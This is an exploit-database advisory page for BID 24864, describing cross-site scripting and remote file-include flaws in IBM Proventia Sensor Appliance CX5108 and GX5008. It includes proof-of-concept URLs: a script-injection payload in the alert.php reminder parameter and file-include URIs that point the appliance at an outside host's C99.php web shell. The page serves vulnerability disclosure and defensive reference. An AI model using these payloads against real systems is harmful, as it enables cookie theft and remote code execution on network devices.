header-logo
Suggest Exploit
vendor:
Proventia Sensor Appliance
by:
Alex Hernandez
7.5
CVSS
HIGH
Input-Validation
Unknown
CWE
Product Name: Proventia Sensor Appliance
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: Unknown
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Unknown
Unknown

IBM Proventia Sensor Appliance Multiple Input-Validation Vulnerabilities

The IBM Proventia Sensor Appliance is prone to multiple input-validation vulnerabilities, including multiple remote file-include issues and a cross-site scripting issue. An attacker can exploit these issues to steal cookie-based authentication credentials, view files, and to execute arbitrary server-side script code on an affected device in the context of the webserver process. Other attacks are also possible.

Mitigation:

Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/24864/info

The IBM Proventia Sensor Appliance is prone to multiple input-validation vulnerabilities, including multiple remote file-include issues and a cross-site scripting issue.

An attacker can exploit these issues to steal cookie-based authentication credentials, view files, and to execute arbitrary server-side script code on an affected device in the context of the webserver process. Other attacks are also possible.

IBM Proventia Sensor Appliance CX5108 and GX5008 are vulnerable. 

https://www.example.com/alert.php?reminder=-->//"><script>alert(/XSS_vulnerability_proventia_s0x by Alex Hernandez/);</script>

To exploit a remote file-include issue:

An attacker can exploit these issues via a browser.

The following proof-of-concept URIs are available:

http://www.example.com/index.php?title=http://www.example2.com/C99.php?archive.php

https://www.example.com/main.php?page=https://www.example2.com

Navigation

Suggest Exploit

Services By CQR